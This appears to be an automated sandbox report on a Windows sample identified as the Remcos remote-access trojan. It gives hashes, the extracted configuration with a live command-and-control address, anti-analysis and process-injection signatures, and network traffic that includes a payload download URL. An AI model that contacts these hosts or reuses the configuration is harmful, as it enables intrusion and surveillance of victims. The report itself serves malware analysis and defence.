Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/05/2023, 04:51 UTC

General

  • Target

    SYN2023060702.exe

  • Size

    551KB

  • MD5

    e550594dbf07c3a445d0ee6d44325c96

  • SHA1

    ac62125f63e40ed06e6b3cf7a4b180543894d797

  • SHA256

    efcc97c8dac23a0c8bc179fd3b54efd3594e71d5103f211bf468e2a6e550590e

  • SHA512

    92924f57caf0c7b5fc08576d807079c7c060ccecc882766c5298af18288c9cbd9a9d01bd325007b52d983e669e90db9b42fcbe525442887e3de66d9246c1565e

  • SSDEEP

    12288:ZLLsWrDu24O0XFrfiPfuw91uhQ9TaQX5eQ4L1NbRHgWAvHv3cIXsSlwjFh:ZLLTrfj9TaY5eV5N95AfUVSoFh

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

155.94.185.15:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-FUG8H1

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Checks QEMU agent file (2 TTPs, 2 IoCs)

    Checks presence of the QEMU agent, possibly to detect virtualization.

  • Loads dropped DLL (1 IoC)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (5 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe
    "C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe"
    1⤵
    • Checks QEMU agent file
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe
      "C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe"
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetWindowsHookEx
      PID:320

Network

  • GET (NL)
    http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin
    SYN2023060702.exe
    Remote address:
    194.59.218.151:80
    Request
    GET /GXFckquqUZuCKmRXGvLpRrIB64.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
    Host: 194.59.218.151
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Thu, 18 May 2023 03:57:07 GMT
    Accept-Ranges: bytes
    ETag: "2d8e55d03c89d91:0"
    Server: Microsoft-IIS/8.5
    Date: Fri, 19 May 2023 04:52:03 GMT
    Content-Length: 488000
  • DNS (US)
    geoplugin.net
    SYN2023060702.exe
    Remote address:
    8.8.8.8:53
    Request
    geoplugin.net
    IN A
    Response
    geoplugin.net
    IN A
    178.237.33.50
  • GET (NL)
    http://geoplugin.net/json.gp
    SYN2023060702.exe
    Remote address:
    178.237.33.50:80
    Request
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Fri, 19 May 2023 04:52:09 GMT
    server: Apache
    content-length: 930
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
  • 194.59.218.151:80
    http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin
    http
    SYN2023060702.exe
    8.6kB
    502.7kB
    183
    361

    HTTP Request

    GET http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin

    HTTP Response

    200
  • 155.94.185.15:2404
    tls
    SYN2023060702.exe
    3.2kB
    1.5kB
    14
    15
  • 178.237.33.50:80
    http://geoplugin.net/json.gp
    http
    SYN2023060702.exe
    301 B
    2.4kB
    5
    4

    HTTP Request

    GET http://geoplugin.net/json.gp

    HTTP Response

    200
  • 8.8.8.8:53
    geoplugin.net
    dns
    SYN2023060702.exe
    59 B
    75 B
    1
    1

    DNS Request

    geoplugin.net

    DNS Response

    178.237.33.50

MITRE ATT&CK Enterprise v6

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    b1e27118ea300aff5faa4ea5ebe8b045

    SHA1

    4f06e5bd97129db44efc4c7bd653311ce96c854e

    SHA256

    7a480cb7be0e96f855ea7043264b4c965aec6074021ca92a9f8344c16305a3e9

    SHA512

    46b163e19b415dc9aa42b8e8adfc4e653068907f9aabff27af73dc71394a8a86c323f7c0dddb67dc07b397f94bf86386735b4dacf66469e2fc02193a1b6871c6

  • \Users\Admin\AppData\Local\Temp\nsy17B8.tmp\System.dll

    Filesize

    11KB

    MD5

    c9473cb90d79a374b2ba6040ca16e45c

    SHA1

    ab95b54f12796dce57210d65f05124a6ed81234a

    SHA256

    b80a5cba69d1853ed5979b0ca0352437bf368a5cfb86cb4528edadd410e11352

    SHA512

    eafe7d5894622bc21f663bca4dd594392ee0f5b29270b6b56b0187093d6a3a103545464ff6398ad32d2cf15dab79b1f133218ba9ba337ddc01330b5ada804d7b

  • memory/320-87-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-69-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-73-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-77-0x0000000001470000-0x00000000055F4000-memory.dmp

    Filesize

    65.5MB

  • memory/320-80-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-84-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-70-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-71-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-91-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-95-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-99-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-102-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-106-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-110-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB
